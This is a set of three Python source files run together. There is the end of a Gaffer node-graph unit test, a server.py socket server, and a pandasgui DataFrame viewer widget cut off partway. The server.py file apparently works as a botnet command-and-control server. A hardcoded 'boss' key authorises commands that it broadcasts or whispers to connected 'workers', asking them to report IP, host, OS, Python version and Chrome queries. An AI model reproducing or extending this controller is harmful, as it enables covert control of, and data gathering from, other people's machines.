s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
s["n"] = Gaffer.Node()
self.assertEqual( g.unpositionedNodeGadgets(), [ g.nodeGadget( s["n"] ) ] )
g.setNodePosition( s["n"], imath.V2f( 0 ) )
self.assertEqual( g.unpositionedNodeGadgets(), [] )
def testInputConnectionMaintainedOnNoduleMove( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
s["n1"] = GafferTest.AddNode()
s["n2"] = GafferTest.AddNode()
s["n2"]["op1"].setInput( s["n1"]["sum"] )
self.assertTrue( g.connectionGadget( s["n2"]["op1"] ) is not None )
for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :
Gaffer.Metadata.registerValue( s["n2"]["op1"], "noduleLayout:section", section )
connection = g.connectionGadget( s["n2"]["op1"] )
self.assertTrue( connection is not None )
self.assertTrue( connection.srcNodule() is not None )
self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( s["n1"] ).nodule( s["n1"]["sum"] ) ) )
self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( s["n2"] ).nodule( s["n2"]["op1"] ) ) )
def testOutputConnectionMaintainedOnNoduleMove( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
s["n1"] = GafferTest.AddNode()
s["n2"] = GafferTest.AddNode()
s["n2"]["op1"].setInput( s["n1"]["sum"] )
self.assertTrue( g.connectionGadget( s["n2"]["op1"] ) is not None )
for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :
Gaffer.Metadata.registerValue( s["n1"]["sum"], "noduleLayout:section", section )
connection = g.connectionGadget( s["n2"]["op1"] )
self.assertTrue( connection is not None )
self.assertTrue( connection.srcNodule() is not None )
self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( s["n1"] ).nodule( s["n1"]["sum"] ) ) )
self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( s["n2"] ).nodule( s["n2"]["op1"] ) ) )
def testInputConnectionMaintainedOnNestedNoduleMove( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
s["n1"] = GafferTest.AddNode()
s["n2"] = GafferTest.ArrayPlugNode()
Gaffer.Metadata.registerValue( s["n2"]["in"], "nodule:type", "GafferUI::CompoundNodule" )
s["n2"]["in"][0].setInput( s["n1"]["sum"] )
self.assertTrue( g.connectionGadget( s["n2"]["in"][0] ) is not None )
for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :
Gaffer.Metadata.registerValue( s["n2"]["in"], "noduleLayout:section", section )
connection = g.connectionGadget( s["n2"]["in"][0] )
self.assertTrue( connection is not None )
self.assertTrue( connection.srcNodule() is not None )
self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( s["n1"] ).nodule( s["n1"]["sum"] ) ) )
self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( s["n2"] ).nodule( s["n2"]["in"][0] ) ) )
def testNodeGadgetMetadataChanges( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
s["n1"] = GafferTest.AddNode()
s["n2"] = GafferTest.AddNode()
s["n2"]["op1"].setInput( s["n1"]["sum"] )
def assertBothVisible() :
ng1 = g.nodeGadget( s["n1"] )
ng2 = g.nodeGadget( s["n2"] )
c = g.connectionGadget( s["n2"]["op1"] )
self.assertTrue( isinstance( ng1, GafferUI.StandardNodeGadget ) )
self.assertTrue( isinstance( ng2, GafferUI.StandardNodeGadget ) )
self.assertTrue( isinstance( c, GafferUI.StandardConnectionGadget ) )
self.assertTrue( c.srcNodule().isSame( ng1.nodule( s["n1"]["sum"] ) ) )
self.assertTrue( c.dstNodule().isSame( ng2.nodule( s["n2"]["op1"] ) ) )
assertBothVisible()
Gaffer.Metadata.registerValue( s["n1"], "nodeGadget:type", "" )
def assertN1Hidden() :
ng1 = g.nodeGadget( s["n1"] )
ng2 = g.nodeGadget( s["n2"] )
c = g.connectionGadget( s["n2"]["op1"] )
self.assertTrue( ng1 is None )
self.assertTrue( isinstance( ng2, GafferUI.StandardNodeGadget ) )
self.assertTrue( isinstance( c, GafferUI.StandardConnectionGadget ) )
self.assertTrue( c.srcNodule() is None )
self.assertTrue( c.dstNodule().isSame( ng2.nodule( s["n2"]["op1"] ) ) )
assertN1Hidden()
Gaffer.Metadata.registerValue( s["n2"], "nodeGadget:type", "" )
def assertBothHidden() :
self.assertTrue( g.nodeGadget( s["n1"] ) is None )
self.assertTrue( g.nodeGadget( s["n2"] ) is None )
self.assertTrue( g.connectionGadget( s["n2"]["op1"] ) is None )
assertBothHidden()
Gaffer.Metadata.registerValue( s["n2"], "nodeGadget:type", "GafferUI::StandardNodeGadget" )
assertN1Hidden()
Gaffer.Metadata.registerValue( s["n1"], "nodeGadget:type", "GafferUI::StandardNodeGadget" )
assertBothVisible()
if __name__ == "__main__":
unittest.main()
|
server.py | import socket, threading
hostname = socket.gethostname()
# STUFF
workers = []
Job_key = "THIS IS A JOB TASK"
server_private_key = "8d6fsdfh39ur893uruf86we7f58734y uihuhUYGIUDHS*&AD9d8 3yuh78y(*iu(d*&D"
expression_key = "This is an expresiion"
Query_Key = "This is a Query"
# Global variable that mantain client's connections
connections = []
def handle_user_connection(connection: socket.socket, address: str) -> None:
'''
Get user connection in order to keep receiving their messages and
sent to others users/connections.
'''
workers.append(address)
while True:
try:
# Get client message
msg = connection.recv(1024)
from_boss = False
Job_related = False
# If no message is received, there is a chance that connection has ended
# so in this case, we need to close connection and remove it from connections list.
if msg:
if server_private_key in msg.decode():
from_boss = True
if Job_key in msg.decode():
Job_related = True
# Log message sent by user
m = msg.decode()
if from_boss == True:
print(f'BOS {address[0]}:{address[1]} - {m[len(server_private_key):]}')
if m[len(server_private_key):] == "IP":
broadcast(Job_key + "Get IP", connection)
if m[len(server_private_key):] == "PYV":
broadcast(Job_key + "Get python version", connection)
if m[len(server_private_key):] == "HOST":
broadcast(Job_key + "hostthing", connection)
if "CHROME " in m[len(server_private_key):]:
n = m[len(server_private_key):]
query = n.strip("CHROME ")
broadcast(Job_key + Query_Key + query, connection)
if m[len(server_private_key):] == "CHROME":
broadcast(Job_key + "thing", connection)
if m[len(server_private_key):] == "OS":
broadcast(Job_key + "bruh", connection)
if "whisp " in m[len(server_private_key):]:
t = m[len(server_private_key):]
x = t.strip("whisp ")
args = x.split()
print (args[0] + " " + args[1])
whisper(args[0], Job_key + args[1], connection)
if expression_key in m[len(server_private_key):]:
n = m[len(server_private_key):]
exp = n[len(expression_key):]
broadcast(expression_key + str(exp), connection)
elif Job_related == True:
print(f'JOB {address[0]}:{address[1]} - {msg.decode().strip(Job_key)}')
print (msg.decode().strip(Job_key))
else:
print(f'MSG {address[0]}:{address[1]} - {msg.decode()}')
msg_to_send = f'From {address[0]}:{address[1]} - {msg.decode()}'
# Build message format and broadcast to users connected on server
msg_to_send = f'From {address[0]}:{address[1]} - {msg.decode()}'
broadcast(msg_to_send, connection)
# Example:
# broadcast(Job_key + "do this thing", connection)
# Close connection if no message was sent
else:
remove_connection(connection)
break
except Exception as e:
print(f'Error to handle user connection: {e}')
remove_connection(connection)
break
def broadcast(message: str, connection: socket.socket) -> None:
'''
Broadcast message to all users connected to the server
'''
# Iterate on connections in order to send message to all client's connected
for client_conn in connections:
# Check if isn't the connection of who's send
if client_conn != connection:
try:
# Sending message to client connection
client_conn.send(message.encode())
# if it fails, there is a chance of socket has died
except Exception as e:
print('Error broadcasting message: {e}')
remove_connection(client_conn)
def whisper(worker, message: str, connection:socket.socket) -> None:
'''
send a message to a specific worker
'''
for client_conn in connections:
if worker in str(client_conn):
target = client_conn
break
target.send(message.encode())
def remove_connection(conn: socket.socket) -> None:
'''
Remove specified connection from connections list
'''
# Check if connection exists on connections list
if conn in connections:
# Close socket connection and remove connection from connections list
conn.close()
connections.remove(conn)
def server() -> None:
'''
Main process that receive client's connections and start a new thread
to handle their messages
'''
LISTENING_PORT = 12000
try:
# Create server and specifying that it can only handle 4 connections by time!
socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_instance.bind(('', LISTENING_PORT))
socket_instance.listen(4)
print('Server running!')
print ("Your server is running on IP: " + socket.gethostbyname(hostname) + " on PORT: " + str(LISTENING_PORT))
while True:
# Accept client connection
socket_connection, address = socket_instance.accept()
# Add client connection to connections list
connections.append(socket_connection)
# Start a new thread to handle client connection and receive it's messages
# in order to send to others connections
threading.Thread(target=handle_user_connection, args=[socket_connection, address]).start()
except Exception as e:
print(f'An error has occurred when instancing socket: {e}')
finally:
# In case of any problem we clean all connections and close the server connection
if len(connections) > 0:
for conn in connections:
remove_connection(conn)
socket_instance.close()
if __name__ == "__main__":
server()
|
dataframe_viewer.py | import sys
import threading
import os
from typing import Union
import numpy as np
import pandas as pd
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import Qt
from typing_extensions import Literal
from pandasgui.store import PandasGuiDataFrameStore
import pandasgui
import logging
from pandasgui.widgets.column_menu import ColumnMenu
logger = logging.getLogger(__name__)
class DataFrameViewer(QtWidgets.QWidget):
def __init__(self, pgdf: PandasGuiDataFrameStore):
super().__init__()
pgdf = PandasGuiDataFrameStore.cast(pgdf)
pgdf.dataframe_viewer = self
self.pgdf = pgdf
# Local state
# How to color cells
self.color_mode: Literal[None, 'column', 'row', 'all'] = None
# Set up DataFrame TableView and Model
self.dataView = DataTableView(parent=self)
# Create headers
self.columnHeader = HeaderView(parent=self, orientation=Qt.Horizontal)
self.indexHeader = HeaderView(parent=self, orientation=Qt.Vertical)
self.columnHeaderNames = HeaderNamesView(parent=self, orientation=Qt.Horizontal)
self.indexHeaderNames = HeaderNamesView(parent=self, orientation=Qt.Vertical)
# Set up layout
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setSpacing(0)
self.setLayout(self.gridLayout)
# Linking scrollbars
# Scrolling in data table also scrolls the headers
self.dataView.horizontalScrollBar().valueChanged.connect(self.columnHeader.horizontalScrollBar().setValue)
self.dataView.verticalScrollBar().valueChanged.connect(self.indexHeader.verticalScrollBar().setValue)
# Scrolling in headers also scrolls the data table
self.columnHeader.horizontalScrollBar().valueChanged.connect(self.dataView.horizontalScrollBar().setValue)
self.indexHeader.verticalScrollBar().valueChanged.connect(self.dataView.verticalScrollBar().setValue)
# Turn off default scrollbars
self.dataView.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.dataView.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
# Disable scrolling on the headers. Even though the scrollbars are hidden, scrolling by dragging desyncs them
self.indexHeader.horizontalScrollBar().valueChanged.connect(lambda: None)
class CornerWidget(QtWidgets.QWidget):
def __init__(self):
super().__init__()
# https://stackoverflow.com/questions/32313469/stylesheet-in-pyside-not-working
self.setAttribute(QtCore.Qt.WA_StyledBackground)
self.corner_widget = CornerWidget()
self.corner_widget.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding,
QtWidgets.QSizePolicy.Expanding))
# Add items to grid layout
self.gridLayout.addWidget(self.corner_widget, 0, 0)
self.gridLayout.addWidget(self.columnHeader, 0, 1, 2, 2)
self.gridLayout.addWidget(self.columnHeaderNames, 0, 3, 2, 1)
self.gridLayout.addWidget(self.indexHeader, 2, 0, 2, 2)
self.gridLayout.addWidget(self.indexHeaderNames, 1, 0, 1, 1, Qt.AlignBottom)
self.gridLayout.addWidget(self.dataView, 3, 2, 1, 1)
self.gridLayout.addWidget(self.dataView.horizontalScrollBar(), 4, 2, 1, 1)
self.gridLayout.addWidget(self.dataView.verticalScrollBar(), 3, 3, 1, 1)
# Fix scrollbars forcing a minimum height of the dataView which breaks layout for small number of rows
self.dataView.verticalScrollBar().setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed,
QtWidgets.QSizePolicy.Ignored))
self.dataView.horizontalScrollBar().setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored,
QtWidgets.QSizePolicy.Fixed))
# These expand when the window is enlarged instead of having the grid squares spread out
self.gridLayout.setColumnStretch(4, 1)
self.gridLayout.setRowStretch(5, 1)
#
# self.gridLayout.addItem(QtWidgets.QSpacerItem(0, 0,
# QtWidgets.QSizePolicy.Expanding,
# QtWidgets.QSizePolicy.Expanding), 0, 0, 1, 1, )
self.set_styles()
self.indexHeader.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Maximum)
self.columnHeader.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.MinimumExpanding)
# Default row height
default_row_height = 28
self.indexHeader.verticalHeader().setDefaultSectionSize(default_row_height)
self.dataView.verticalHeader().setDefaultSectionSize(default_row_height)
# Set column widths
for column_index in range(self.columnHeader.model().columnCount()):
self.auto_size_column(column_index)
def set_styles(self):
for item in [self.dataView, self.columnHeader, self.indexHeader, self.indexHeaderNames, self.columnHeaderNames]:
item.setContentsMargins(0, 0, 0, 0)
# item.setItemDelegate(NoFocusDelegate())
def __reduce__(self):
# This is so dataclasses.asdict doesn't complain about this being unpicklable
return "DataFrameViewer"
def auto_size_column(self, column_index):
"""
Set the size of column at column_index to fit its contents
"""
width = 0
# Iterate over the data view rows and check the width of each to determine the max width for the column
# Only check the first N rows for performance. If there is larger content in cells below it will be cut off
N = 100
for i in range(self.dataView.model().rowCount())[:N]:
mi = self.dataView.model().index(i, column_index)
text = self.dataView.model().data(mi)
w = self.dataView.fontMetrics().boundingRect(text).width()
width = max(width, w)
# Repeat for header cells
for i in range(self.columnHeader.model().rowCount()):
mi = self.columnHeader.model().index(i, column_index)
text = self.columnHeader.model().data(mi)
w = self.columnHeader.fontMetrics().boundingRect(text).width()
width = max(width, w)
padding = 30
width += padding
# add maximum allowable column width so column is never too big.
max_allowable_width = 500
width = min(width, max_allowable_width)
self.columnHeader.setColumnWidth(column_index, width)
self.dataView.setColumnWidth(column_index, width)
self.dataView.updateGeometry()
self.columnHeader.updateGeometry()
def auto_size_row(self, row_index):
"""
Set the size of row at row_index to fix its contents
"""
padding = 20
self.indexHeader.resizeRowToContents(row_index)
height = self.indexHeader.rowHeight(row_index)
# Iterate over the row's columns and check the width of each to determine the max height for the row
# Only check the first N columns for performance.
N = 100
for i in range(min(N, self.dataView.model().columnCount())):
mi = self.dataView.model().index(row_index, i)
cell_width = self.columnHeader.columnWidth(i)
text = self.dataView.model().data(mi)
# Gets row height at a constrained width (the column width).
# This constrained width, with the flag of Qt.TextWordWrap
# gets the height the cell would have to be to fit the text.
constrained_rect = QtCore.QRect(0, 0, cell_width, 0)
h = self.dataView.fontMetrics().boundingRect(constrained_rect, Qt.TextWordWrap, text).height()
height = max(height, h)
height += padding
self.indexHeader.setRowHeight(row_index, height)
self.dataView.setRowHeight(row_index, height)
self.dataView.updateGeometry()
self.indexHeader.updateGeometry()
def keyPressEvent(self, event):
# Disabling this and moving hotkeys to main GUI
if self.pgdf.gui is not None:
super(DataFrameViewer, self).keyPressEvent(event)
QtWidgets.QWidget.keyPressEvent(self, event)
mods = event.modifiers()
# Ctrl+C
if event.key() == Qt.Key_C and (mods & Qt.ControlModifier):
self.copy()
# Ctrl+Shift+C
if event.key() == Qt.Key_C and (mods & Qt.ShiftModifier) and (mods & Qt.ControlModifier):
self.copy(header=True)
if event.matches(QtGui.QKeySequence.Paste):
self.paste()
if event.key() == Qt.Key_P and (mods & Qt.ControlModifier):
pass
if event.key() == Qt.Key_D and (mods & Qt.ControlModifier):
pass
def copy(self, header=False):
"""
Copy the selected cells to clipboard in an Excel-pasteable format
"""
# Get the bounds using the top left and bottom right selected cells
# Copy from data, columns, or index depending which has focus
if header or self.dataView.hasFocus():
indexes = self.dataView.selectionModel().selection().indexes()
rows = [ix.row() for ix in indexes]
cols = [ix.column() for ix in indexes]
temp_df = self.pgdf.df
df = temp_df.iloc[min(rows): max(rows) + 1, min(cols): max(cols) + 1]
elif self.indexHeader.hasFocus():
indexes = self.indexHeader.selectionModel().selection().indexes()
rows = [ix.row() for ix in indexes]
cols = [ix.column() for ix in indexes]
temp_df = self.pgdf.df.index.to_frame()
df = temp_df.iloc[min(rows): max(rows) + 1, min(cols): max(cols) + 1]
elif self.columnHeader.hasFocus():
indexes = self.columnHeader.selectionModel().selection().indexes()
rows = [ix.row() for ix in indexes]
cols = [ix.column() for ix in indexes]
# Column header should be horizontal so we transpose
temp_df = self.pgdf.df.columns.to_frame().transpose()
df = temp_df.iloc[min(rows): max(rows) + 1, min(cols): max(cols) + 1]
else:
return
# If I try to use df.to_clipboard without starting new thread, large selections give access denied error
if df.shape == (1, 1):
# Special case for single-cell copy, excel=False removes the trailing \n character.
threading.Thread(target=lambda df: df.to_clipboard(index=header, header=header,
excel=False), args=(df,)).start()
else:
threading.Thread(target=lambda df: df.to_clipboard(index=header, header=header), args=(df,)).start()
def paste(self):
df_to_paste = pd.read_clipboard(sep=',|\t',
na_values='""', # https://stackoverflow.com/a/67915100/3620725
header=None, skip_blank_lines=False)
# Get the bounds using the top left and bottom right selected cells
indexes = self.dataView.selectionModel().selection().indexes()
rows = [ix.row() for ix in indexes]
cols = [ix.column() for ix in indexes]
self.pgdf.paste_data(min(rows), min(cols), df_to_paste)
# Select the range of cells that were pasted
self.dataView.selectionModel().clearSelection()
temp = self.dataView.selectionMode()
self.dataView.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)
for i in range(df_to_paste.shape[0]):
for j in range(df_to_paste.shape[1]):
self.dataView.selectionModel().select(self.dataView.model().index(min(rows) + i, min(cols) + j),
QtCore.QItemSelectionModel.Select)
self.dataView.setSelectionMode(temp)
def show_column_menu(self, column_ix_or_name: Union[str, int]):
if isinstance(self.pgdf.df.columns, pd.MultiIndex):
logger.info("Column menu not implemented for MultiIndex")
return
if type(column_ix_or_name) == str:
column_ix = list(self.pgdf.df.columns).index(column_ix_or_name)
else:
column_ix = column_ix_or_name
point = QtCore.QPoint(self.columnHeader.columnViewportPosition(column_ix),
self.columnHeader.geometry().bottom())
menu = ColumnMenu(self.pgdf, column_ix, self)
menu.show_menu(self.columnHeader.mapToGlobal(point))
def _remove_column(self, ix):
for model in [self.dataView.model(), self.columnHeader.model()]:
parent = QtCore.QModelIndex()
model.beginRemoveColumns(parent, ix, ix)
model.endRemoveColumns()
def _move_column(self, ix, new_ix):
for view in [self.dataView, self.columnHeader]:
model = view.model()
column_widths = [view.columnWidth(ix) for ix in range(model.columnCount())]
column_widths.insert(new_ix, column_widths.pop(ix))
# Set width of destination column to the width of the source column
for j in range(len(column_widths)):
view.setColumnWidth(j, column_widths[j])
self.refresh_ui()
def refresh_ui(self):
# Update models
self.models = []
self.models += [self.dataView.model(),
self.columnHeader.model(),
self.indexHeader.model(),
self.columnHeaderNames.model(),
self.indexHeaderNames.model(),
]
for model in self.models:
model.beginResetModel()
model.endResetModel()
# Update multi-index spans
for view in [self.columnHeader,
self.indexHeader]:
view.set_spans()
# Update sizing
for view in [self.columnHeader,
self.indexHeader,
self.dataView]:
view.updateGeometry()
# Remove dotted border on cell focus. https://stackoverflow.com/a/55252650/3620725
class NoFocusDelegate(QtWidgets.QStyledItemDelegate):
def paint(
self,
painter: QtGui.QPainter,
item: QtWidgets.QStyleOptionViewItem,
ix: QtCore.QModelIndex,
):
if item.state & QtWidgets.QStyle.State_HasFocus:
item.state = item.state ^ QtWidgets.QStyle.State_HasFocus
super().paint(painter, item, ix)
class DataTableModel(QtCore.QAbstractTableModel):
"""
Model for DataTableView to connect for DataFrame data
"""
def __init__(self, parent: DataFrameViewer):
super().__init__(parent)
self.dataframe_viewer: DataFrameViewer = parent
self.pgdf: PandasGuiDataFrameStore = parent.pgdf
def headerData(self, section, orientation, role=None):
# Headers for DataTableView are hidden. Header data is shown in HeaderView
pass
def columnCount(self, parent=None):
return self.pgdf.df.columns.shape[0]
def rowCount(self, parent=None):
return len(self.pgdf.df)
# Returns the data from the DataFrame
def data(self, index, role=QtCore.Qt.DisplayRole):
row = index.row()
col = index.column()
cell = self.pgdf.df.iloc[row, col]
if (role == QtCore.Qt.DisplayRole
or role == QtCore.Qt.EditRole
or role == QtCore.Qt.ToolTipRole):
# Need to check type since a cell might contain a list or Series, then .isna returns a Series not a bool
cell_is_na = pd.isna(cell)
if type(cell_is_na) == bool and cell_is_na:
if role == QtCore.Qt.DisplayRole:
return "●"
elif role == QtCore.Qt.EditRole:
return ""
elif role == QtCore.Qt.ToolTipRole:
return "NaN"
# Float formatting
if isinstance(cell, (float, np.floating)):
if not role == QtCore.Qt.ToolTipRole:
return "{:.4f}".format(cell)
return str(cell)
elif role == QtCore.Qt.ToolTipRole:
return str(cell)
elif role == QtCore.Qt.BackgroundRole:
color_mode = self.dataframe_viewer.color_mode
if color_mode == None or pd.isna(cell):
return None
try:
x = float(cell)
except:
# Cell isn't numeric
return None
if color_mode == 'all':
percentile = cell / self.pgdf.column_statistics['Max'].max()
elif color_mode == 'row':
percentile = cell / self.pgdf.row_statistics['Max'][row]
elif color_mode == 'column':
percentile = cell / self.pgdf.column_statistics['Max'][col]
else:
raise ValueError
if pd.isna(percentile):
return None
else:
return QtGui.QColor(QtGui.QColor(255, 0, 0, int(255 * percentile)))
def flags(self, index):
if self.dataframe_viewer.pgdf.settings.editable:
return QtCore.Qt.ItemIsEditable | QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
else:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
def setData(self, index, value, role=None):
if role == QtCore.Qt.EditRole:
row = index.row()
col = index.column()
try:
self.pgdf.edit_data(row, col, value)
except Exception as e:
logger.exception(e)
return False
return True
class DataTableView(QtWidgets.QTableView):
"""
Displays the DataFrame data as a table
"""
def __init__(self, parent: DataFrameViewer):
super().__init__(parent)
self.dataframe_viewer: DataFrameViewer = parent
self.pgdf: PandasGuiDataFrameStore = parent.pgdf
# Create and set model
model = DataTableModel(parent)
self.setModel(model)
# Hide the headers. The DataFrame headers (index & columns) will be displayed in the DataFrameHeaderViews
self.horizontalHeader().hide()
self.verticalHeader().hide()
# Link selection to headers
self.selectionModel().selectionChanged.connect(self.on_selectionChanged)
# Settings
# self.setWordWrap(True)
# self.resizeRowsToContents()
self.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
def on_selectionChanged(self):
"""
Runs when cells are selected in the main table. This logic highlights the correct cells in the vertical and
horizontal headers when a data cell is selected
"""
columnHeader = self.dataframe_viewer.columnHeader
indexHeader = self.dataframe_viewer.indexHeader
# The two blocks below check what columns or rows are selected in the data table and highlights the
# corresponding ones in the two headers. The if statements check for focus on headers, because if the user
# clicks a header that will auto-select all cells in that row or column which will trigger this function
# and cause and infinite loop
if not columnHeader.hasFocus():
selection = self.selectionModel().selection()
columnHeader.selectionModel().select(
selection,
QtCore.QItemSelectionModel.Columns
| QtCore.QItemSelectionModel.ClearAndSelect,
)
if not indexHeader.hasFocus():
selection = self.selectionModel().selection()
indexHeader.selectionModel().select(
selection,
QtCore.QItemSelectionModel.Rows
| QtCore.QItemSelectionModel.ClearAndSelect,
)
def sizeHint(self):
# Set width and height based on number of columns in model
# Width
width = 2 * self.frameWidth() # Account for border & padding
# width += self.verticalScrollBar().width() # Dark theme has scrollbars always shown
for i in range(self.model().columnCount()):
width += self.columnWidth(i)
# Height
height = 2 * self.frameWidth() # Account for border & padding
# height += self.horizontalScrollBar().height() # Dark theme has scrollbars always shown
for i in range(self.model().rowCount()):
height += self.rowHeight(i)
return QtCore.QSize(width, height)
class HeaderModel(QtCore.QAbstractTableModel):
def __init__(self, parent, orientation):
super().__init__(parent)
self.orientation = orientation
self.pgdf: PandasGuiDataFrameStore = parent.pgdf
def columnCount(self, parent=None):
if self.orientation == Qt.Horizontal:
return self.pgdf.df.columns.shape[0]
else: # Vertical
return self.pgdf.df.index.nlevels
def rowCount(self, parent=None):
if self.orientation == Qt.Horizontal:
return self.pgdf.df.columns.nlevels
elif self.orientation == Qt.Vertical:
return self.pgdf.df.index.shape[0]
def data(self, index, role=QtCore.Qt.DisplayRole):
row = index.row()
col = index.column()
if role == QtCore.Qt.DisplayRole or role == QtCore.Qt.ToolTipRole:
if self.orientation == Qt.Horizontal:
if isinstance(self.pgdf.df.columns, pd.MultiIndex):
return str(self.pgdf.df.columns[col][row])
else:
return str(self.pgdf.df.columns[col])
elif self.orientation == Qt.Vertical:
if isinstance(self.pgdf.df.index, pd.MultiIndex):
return str(self.pgdf.df.index[row][col])
else:
return str(self.pgdf.df.index[row])
if role == QtCore.Qt.DecorationRole:
if self.pgdf.sort_state == "Asc":
icon = QtGui.QIcon(os.path.join(pandasgui.__path__[0], "resources/images/sort-ascending.svg"))
elif self.pgdf.sort_state == "Desc":
icon = QtGui.QIcon(os.path.join(pandasgui.__path__[0], "resources/images/sort-descending.svg"))
else:
return
if col == self.pgdf.sorted_column_ix and row == self.rowCount() - 1 and self.orientation == Qt.Horizontal:
return icon
# The headers of this table will show the level names of the MultiIndex
def headerData(self, section, orientation, role=None):
# This was moved to HeaderNamesModel
pass
class HeaderView(QtWidgets.QTableView):
"""
Displays the DataFrame index or columns depending on orientation
"""
def __init__(self, parent: DataFrameViewer, orientation):
super().__init__(parent)
self.dataframe_viewer: DataFrameViewer = parent
self.pgdf: PandasGuiDataFrameStore = parent.pgdf
self.setProperty('orientation', 'horizontal' if orientation == 1 else 'vertical') # Used in stylesheet
# Setup
self.orientation = orientation
self.table = parent.dataView
self.setModel(HeaderModel(parent, orientation))
self.padding = 90
# These are used during column resizing
self.header_being_resized = None
self.resize_start_position = None
self.initial_header_size = None
# Handled by self.eventFilter()
self.setMouseTracking(True)
self.viewport().setMouseTracking(True)
self.viewport().installEventFilter(self)
# Settings
self.setIconSize(QtCore.QSize(16, 16))
self.setSizePolicy(
QtWidgets.QSizePolicy(
QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum
)
)
self.setWordWrap(False)
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
font = QtGui.QFont()
font.setBold(True)
self.setFont(font)
# Link selection to DataTable
self.selectionModel().selectionChanged.connect(self.on_selectionChanged)
self.set_spans()
self.horizontalHeader().hide()
self.verticalHeader().hide()
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
# Set initial size
self.resize(self.sizeHint())
def mouseDoubleClickEvent(self, event):
point = event.pos()
ix = self.indexAt(point)
col = ix.column()
if event.button() == QtCore.Qt.LeftButton:
# When a header is clicked, sort the DataFrame by that column
if self.orientation == Qt.Horizontal:
self.pgdf.sort_column(col)
else:
self.on_selectionChanged()
else:
super().mouseDoubleClickEvent(event)
def mousePressEvent(self, event):
point = event.pos()
ix = self.indexAt(point)
col = ix.column()
col_name = self.pgdf.df.columns[col]
if event.button() == QtCore.Qt.RightButton and self.orientation == Qt.Horizontal:
self.dataframe_viewer.show_column_menu(col)
else:
super().mousePressEvent(event)
# Header
def on_selectionChanged(self):
"""
Runs when cells are selected in the Header. This selects columns in the data table when the header is clicked,
and then calls selectAbove()
"""
# Check focus so we don't get recursive loop, since headers trigger selection of data cells and vice versa
if self.hasFocus():
dataView = self.dataframe_viewer.dataView
# Set selection mode so selecting one row or column at a time adds to selection each time
if (
self.orientation == Qt.Horizontal
): # This case is for the horizontal header
# Get the header's selected columns
selection = self.selectionModel().selection()
# Removes the higher levels so that only the lowest level of the header affects the data table selection
last_row_ix = self.pgdf.df.columns.nlevels - 1
last_col_ix = self.model().columnCount() - 1
higher_levels = QtCore.QItemSelection(
self.model().index(0, 0),
self.model().index(last_row_ix - 1, last_col_ix),
)
selection.merge(higher_levels, QtCore.QItemSelectionModel.Deselect)
# Select the cells in the data view
dataView.selectionModel().select(
selection,
QtCore.QItemSelectionModel.Columns
| QtCore.QItemSelectionModel.ClearAndSelect,
)
if self.orientation == Qt.Vertical:
selection = self.selectionModel().selection()
last_row_ix = self.model().rowCount() - 1
last_col_ix = self.pgdf.df.index.nlevels - 1
higher_levels = QtCore.QItemSelection(
self.model().index(0, 0),
self.model().index(last_row_ix, last_col_ix - 1),
)
selection.merge(higher_levels, QtCore.QItemSelectionModel.Deselect)
dataView.selectionModel().select(
selection,
QtCore.QItemSelectionModel.Rows
| QtCore.QItemSelectionModel.ClearAndSelect,
)
self.selectAbove()
# Take the current set of selected cells and make it so that any spanning cell above a selected cell is selected too
# This should happen after every selection change
def selectAbove(self):
# Disabling this to allow selecting specific cells in headers
return
if self.orientation == Qt.Horizontal:
if self.pgdf.df.columns.nlevels == 1:
return
else:
if self.pgdf.df.index.nlevels == 1:
return
for ix in self.selectedIndexes():
if self.orientation == Qt.Horizontal:
# Loop over the rows above this one
for row in range(ix.row()):
ix2 = self.model().index(row, ix.column())
self.setSelection(self.visualRect(ix2), QtCore.QItemSelectionModel.Select)
else:
# Loop over the columns left of this one
for col in range(ix.column()):
ix2 = self.model().index(ix.row(), col)
self.setSelection(self.visualRect(ix2), QtCore.QItemSelectionModel.Select)
# This sets spans to group together adjacent cells with the same values
def set_spans(self):
df = self.pgdf.df
self.clearSpans()
# Find spans for horizontal HeaderView
if self.orientation == Qt.Horizontal:
# Find how many levels the MultiIndex has
if isinstance(df.columns, pd.MultiIndex):
N = len(df.columns[0])
else:
N = 1
for level in range(N): # Iterates over the levels
# Find how many segments the MultiIndex has
if isinstance(df.columns, pd.MultiIndex):
